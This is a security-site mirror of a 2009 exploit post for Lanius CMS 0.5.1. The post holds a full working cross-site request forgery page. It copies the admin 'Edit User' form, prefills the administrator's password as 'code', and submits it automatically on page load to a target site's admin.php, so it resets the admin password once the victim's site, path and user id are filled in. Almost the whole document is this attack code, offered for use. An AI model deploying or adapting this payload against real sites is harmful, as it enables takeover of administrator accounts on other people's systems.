首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Lanius CMS version 0.5.1 cross site request forgery exploit
来源:d14l.123[at]hotmail.com 作者:d14l 发布时间:2009-02-11   
[-]Lanius CMS 0.5.1 CSRF vulnerability

[-]exploit found by d14l and marcoj



[-]greetz to soul,stefo,sp1r1t,invisible,kisobran and others


[-] lanius CMS suffers from csrf vulnerabilities which allows attacker change admins password



it is only important to change in source [site],[path] and [id] of victim and it will change victims password to "code"






//////////////////////////////////////////////////CODE///////////////////////////////////////////////////////////////////////////




<script type="text/javascript" language="javascript" src="http://[site]/[path]/admin/includes/js/anthill.js"></script>
<script type="text/javascript" language="javascript">
/* <![CDATA[ */
var lcms_data_form='adminform';
/* ]]> */
</script>
<script type="text/javascript" language="javascript" src="includes/js/progressbar.js"></script>
<script type="text/javascript" language="javascript" src="includes/js/passwordquality.js"></script>
<link href="includes/css/progressbar.css" rel="stylesheet" type="text/css" media="all" />

<script type="text/javascript" language="javascript">
/* <![CDATA[ */
function _init_pwd_box() {
		initQualityMeter("user_password", "the_password", "Password quality: ");
	}
	pb_addEvent(window, "load", _init_pwd_box);

/* ]]> */
</script>
<script type="text/javascript" language="javascript">
/* <![CDATA[ */

	var dil_folder = 'media/forum/avatars/';
	var dil_default_src = 'media/forum/avatars/default.png';
	
	function changeImage(srcObj,srcListName) {
		var im=document.getElementById("image_"+srcListName);
		var obj_v = srcObj.value;
		if (obj_v==null || obj_v=="") im.src = dil_default_src; 
		else im.src = dil_folder+obj_v;
	}

	
/* ]]> */
</script>
<script type="text/javascript" language="javascript" src="components/forum/forum.js"></script>
<script type="text/javascript" language="javascript">
/* <![CDATA[ */
function ui_lcms_st(pressbutton){
var frm=document.getElementById(lcms_data_form);
	if ( pressbutton == 'save' ) {
		
var frm=document.getElementById('adminform');
	field_value=frm.user_name.value;
	if (!field_value.length) { alert("Invalid value for\n\nDisplay name");return false;
}
	field_value=frm.user_user.value;
	if (!field_value.length) { alert("Invalid value for\n\nUsername");return false;
}
	field_value=frm.user_email.value;
	if (!field_value.length) { alert("Invalid value for\n\nEmail");return false;
}

	}	if ( pressbutton == 'cancel' ) {
		document.location.href=frm.action; return;}

	lcms_st(pressbutton);
}

/* ]]> */
</script>
<script language="javascript" type="text/javascript">
var cmThemeDefaultBase = "admin/templates/default/images/";
</script>
<script language="javascript" src="admin/templates/default/js/JSCookMenu.js" type="text/javascript"></script>
<script language="javascript" src="index2.php?option=service&amp;service=admin_menu&amp;no_html=1&amp;lang=en" type="text/javascript"></script>
<script language="javascript" src="admin/templates/default/js/ThemeDefault/theme.js" type="text/javascript"></script>
<link rel="stylesheet" href="admin/templates/default/js/ThemeDefault/theme.css" type="text/css" /><script language="javascript" src="admin/includes/js/dhtml.js" type="text/javascript"></script>

<link rel="stylesheet" href="admin/templates/default/css/template.style.css" type="text/css" />
</head>
<body>
<body onload="ui_lcms_st('save');">

<table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td width="320" class="top-logo" >
		<img src="admin/templates/default/images/header.png" alt="Administration" />
	</td>
    <td width="240" class="top-update" >
<a class="dlinks" title="Information about the latest version available, click to start the automatic update wizard" href="http://[site]/[path]/admin.php?com_option=system&amp;option=autoupdate"><img border="0" src="http://www.laniuscms.org/services/status.png.php?v=0.5.1+r843" alt="Information about the latest version available, click to start the automatic update wizard"  /></a>	
	</td>
    <td align="right" class="top-logo" ><a href="index.php?option=login&amp;task=logout" class="wlink" style="color: #e5e5e5"><img src="admin/templates/default/images/logout.png" border="0" alt="" />&nbsp;Logout</a>&nbsp;</td>

  </tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
              <tr class="toolmenu">
                <td height="25"><div id="myMenuID" style="margin-left: 15px;"></div>
<script language="javascript" type="text/javascript">
			cmDraw ("myMenuID", myMenu, "hbr", cmThemeDefault, "ThemeDefault");
		</script>
<noscript><big>Your browser does not have javascript support, please enable it or either ask the administrator to enable a non-javascript menu</big></noscript></td>
                <td align="right">
                    <table class="hotlinks" border="0" cellspacing="0" cellpadding="2">
                      <tr><td>&nbsp;</td>

						                      </tr>
                    </table>
                </td>
                <td align="right"></td>
              </tr>
</table>
<table width="100%" cellspacing="0" cellpadding="0">
<tr><td class="pathway-backend"><a title="Home page" href="http://[site]/[path]/admin.php" class="pathway"><img src="media/common/home.png" border="0" alt="Home page" /></a> Edit User <a title="Permanent link to this page" href="http://[site]/[path]/admin.php?com_option=user&amp;task=edit&amp;cid[]=[id]"><img src="media/common/box.png" border="0" alt="Permanent link to this page" /></a> </td>
	</tr>

</table>
	<div class="dka_component">
<form id='adminform' name='adminform' method='post' action='http://[site]/[path]/admin.php?com_option=user'  enctype='multipart/form-data'><div class="toolbar-header"><input name="btn_save" type="button" value="Save" onclick="ui_lcms_st('save');"  />
<input name="btn_cancel" type="button" value="Cancel" onclick="history.go(-1)"  />
<noscript>
<p> If you have no javascript support, then ignore the above buttons and use this combo box.</p>
<select name="alt_task[]">
<option value="">--</option>
<option value="save">Save</option>
<option value="cancel">Cancel</option>
</select>
<input type="submit" value="Go" /></noscript>
</div><table border='0' cellpadding='0' cellspacing='0' width='100%' align='center'>
<tr><td colspan='2' class="" ><input type="hidden" name="task" value="" /></td></tr>

<tr><td colspan='2' class="header1" >Edit User</td></tr>

<tr><td colspan="2">
<table width="100%" border="0" cellpadding="5" cellspacing="2" >
          <tr><td class="tabtitle">Edit User&nbsp;</td></tr><tr>

          <td class="tabbody">
                  <table width="90%" border="0" align="center" cellpadding="2" cellspacing="0">
                   <tr><td width="200">&nbsp;</td><td>&nbsp;</td></tr>
<tr><td colspan='2' class="" ><input type="hidden" name="user_id" value="244" /></td></tr>

<tr><td class="" valign="top" nowrap="nowrap"><span style="color:red">*</span> Display name</td><td class="" ><input type="text" name="user_name" value="Webaaaaamaster" class="tf"  size="40" /></td></tr>

<tr><td class="" valign="top" nowrap="nowrap"><span style="color:red">*</span> Username</td><td class="" ><input type="text" name="user_user" value="admin" class="tf"  size="40" /></td></tr>

<tr><td class="" valign="top" nowrap="nowrap"><span style="color:red">*</span> Email</td><td class="" ><input type="text" name="user_email" value="webmaster@example.com" class="tf"  size="40" /></td></tr>

<tr><td class="" valign="top" nowrap="nowrap"> Language</td><td class="" ><select name="user_lang" class="tf">
<option value="" selected="selected" style="color: grey">-- Auto --</option>
<option value="en">English</option>
</select>
</td></tr>

<tr><td class="" valign="top" nowrap="nowrap"> User timezone</td><td class="" ><select name="user_tz" class="tf">

<option value="">-- Auto --</option>
<option value="Africa/Abidjan">Africa/Abidjan</option>

</select>
</td></tr>

<tr><td class="" valign="top" nowrap="nowrap"> Users Group</td><td class="" ><select name="user_gid" class="tf">
<option value="1">Registered</option>
<option value="2">Editor</option>
<option value="3">Publisher</option>
<option value="4">Manager</option>
<option value="5" selected="selected" style="color: grey">Administrator</option>

</select>
</td></tr>

<tr><td colspan='2' class="" >&nbsp;</td></tr>

<tr><td colspan='2' class="" > Leave the password field empty to preserve the previous password</td></tr>

<tr><td class="" valign="top" nowrap="nowrap"> Password</td><td class="" ><input type="password" name='user_password' value='code' class="tf" size='40'  onkeypress="updateQualityMeter(this)" /></td></tr>

<tr><td class="" valign="top" nowrap="nowrap"> </td><td class="" ><div id="the_password"></div></td></tr>

<tr><td class="" valign="top" nowrap="nowrap"> Password confirmation</td><td class="" ><input type="password" name='user_password1' value='code' class="tf" size='40'  /></td></tr>

<tr><td colspan='2' class="" >&nbsp;</td></tr>

<tr><td class="" valign="top" nowrap="nowrap"> </td><td class="" ><label for="user_message_allow">
<input id="user_message_allow" name="user_message_allow" type="checkbox"  />Allow other users to send messages to me (email will not be visible to them)</label><br /><label for="user_message_show_email">
<input id="user_message_html" name="user_message_html" type="checkbox"  />Can receive HTML emails</label><br /><label for="user_message_attach">
<input id="user_message_attach" name="user_message_attach" type="checkbox"  checked="checked"/>Receive also attachments</label><br />
	<div class="dk_content"><h3>Avatar</h3><table border="0" cellspacing="0" cellpadding="0"><tr>
	<td><select name='user_avatar' class="tf" size='6' onchange='javascript:changeImage(this,"user_avatar")' >
<option value="default.png" selected='selected' >&lt; Current &gt;</option>

<option value="abstract8.png"  >abstract8.png</option>


</select></td>
	<td><img src="media/forum/avatars/default.png" id="image_user_avatar" name="image_user_avatar" border="2" alt="" /></td>
</tr></table>
<script type="text/javascript" language="javascript">
/* <![CDATA[ */
var tmpi_0 = new Image();
tmpi_0.src="media/forum/avatars/default.png";

/* ]]> */
</script>
</div>
				<div class="dk_content"><input type="hidden" name="MAX_FILE_SIZE" value="614400" />
<input id="user_uploaded_avatar" name="user_uploaded_avatar" type="file" class="dk_inputbox" value="" size="45"  /></div>
				<div class="dk_content">
		<h3>Forum user statistics</h3>Posts: 1<br />Member since 09 February 2009 19:10</div>

	<p><h3>Forum user information</h3></p>
	<div class="dk_content">Location: <input class="dk_inputbox" type="text" name="user_location" size="40" maxlength="100" value="" /></div>
	<div class="dk_content">Website: <input class="dk_inputbox" type="text" name="user_url" size="40" value="" /></div>
	<table border="0">
			  <tr>
			<td valign="top">&nbsp;</td>
			<td><a href='javascript:DoPrompt("user_information", "url");'><img src="components/forum/images/bburl.png" alt="Web Address" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_information", "email");'><img src="components/forum/images/bbemail.png" alt="Email Address" hspace="1" border="0"/></a> <a href='javascript:DoPrompt("user_information", "bold");'><img src="components/forum/images/bbbold.png" alt="Bold Text" border="0" hspace="1" /></a> <a href='javascript:DoPrompt("user_information", "italic");'><img src="components/forum/images/bbitalic.png" alt="Italic Text" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_information", "underline");'><img src="components/forum/images/bbunderline.png" alt="Underlined Text" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_information", "quote");'><img src="components/forum/images/bbquote.png" alt="Quote" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_information", "code");'><img src="components/forum/images/bbcode.png" alt="Code" border="0" hspace="1"/></a>

			</td>
		  </tr>
		  <tr>
			<td valign="top">User provided information (max 1024 characters)</td>
			<td><textarea name="user_information" cols="30" rows="16" class="dk_inputbox" id="user_information"></textarea></td>
		  </tr>		  <tr>
			<td valign="top">&nbsp;</td>

			<td><a href='javascript:DoPrompt("user_signature", "url");'><img src="components/forum/images/bburl.png" alt="Web Address" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_signature", "email");'><img src="components/forum/images/bbemail.png" alt="Email Address" hspace="1" border="0"/></a> <a href='javascript:DoPrompt("user_signature", "bold");'><img src="components/forum/images/bbbold.png" alt="Bold Text" border="0" hspace="1" /></a> <a href='javascript:DoPrompt("user_signature", "italic");'><img src="components/forum/images/bbitalic.png" alt="Italic Text" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_signature", "underline");'><img src="components/forum/images/bbunderline.png" alt="Underlined Text" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_signature", "quote");'><img src="components/forum/images/bbquote.png" alt="Quote" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_signature", "code");'><img src="components/forum/images/bbcode.png" alt="Code" border="0" hspace="1"/></a>
			</td>
		  </tr>
		  <tr>
			<td valign="top">Custom signature (max 300 characters)</td>

			<td><textarea name="user_signature" cols="30" rows="3" class="dk_inputbox" id="user_signature"></textarea></td>
		  </tr>	</table></td></tr>

</table></td></tr></table>
</td></tr>
</table><br /><div class="toolbar-footer" style="text-align: left"><input name="btn_save" type="button" value="Save" onclick="ui_lcms_st('save');"  />
<input name="btn_cancel" type="button" value="Cancel" onclick="history.go(-1)"  />
<noscript>
<p> If you have no javascript support, then ignore the above buttons and use this combo box.</p>
<select name="alt_task[]">
<option value="">--</option>
<option value="save">Save</option>
<option value="cancel">Cancel</option>
</select>
<input type="submit" value="Go" /></noscript>
</div></form></div>
	<div class="footer">
	<div title="Donate now EUR 10 for the Lanius CMS Project" align="center">

<form id="_xclick" name="_xclick" action="https://www.paypal.com/cgi-bin/webscr" method="post" target="_blank">
<input name="cmd" value="_xclick" type="hidden" />
<input name="business" value="donations@laniuscms.org" type="hidden" />
<input name="no_shipping" value="0" type="hidden" />
<input name="lc" value="EN" type="hidden" />
<input name="item_name" value="Lanius CMS Project donation from website" type="hidden" />
<input name="currency_code" value="EUR" type="hidden" />
<input name="amount" value="10.00" type="hidden" />
Support the Lanius CMS Project with a small donation:
<input src="media/common/donate.png" name="submit" alt="Lanius CMS Project donation from website" type="image" />
</form>
</div>
	</div>
</body>
</html>

////////////////////////////////////////////end of code////////////////////////////////////////////////
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·TYPO3 < 4.0.12/4.1.10/4.2.6 (j
·Bloggeruniverse v2Beta (editco
·ProFTPd with mod_mysql Authent
·Remote exploit for the authent
·Fluorine CMS 0.1 rc 1 FD / SQL
·Remote exploit for InselPhoto
·q-news 2.0 Remote Command Exec
·ProFTPd with mod_mysql Authent
·Php168 v2008 权限提升漏洞
·Nokia N95-8 browser (setAttrib
·Hedgedog CMS version 1.21 remo
·ea-gBook 0.1 Remote Command Ex
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved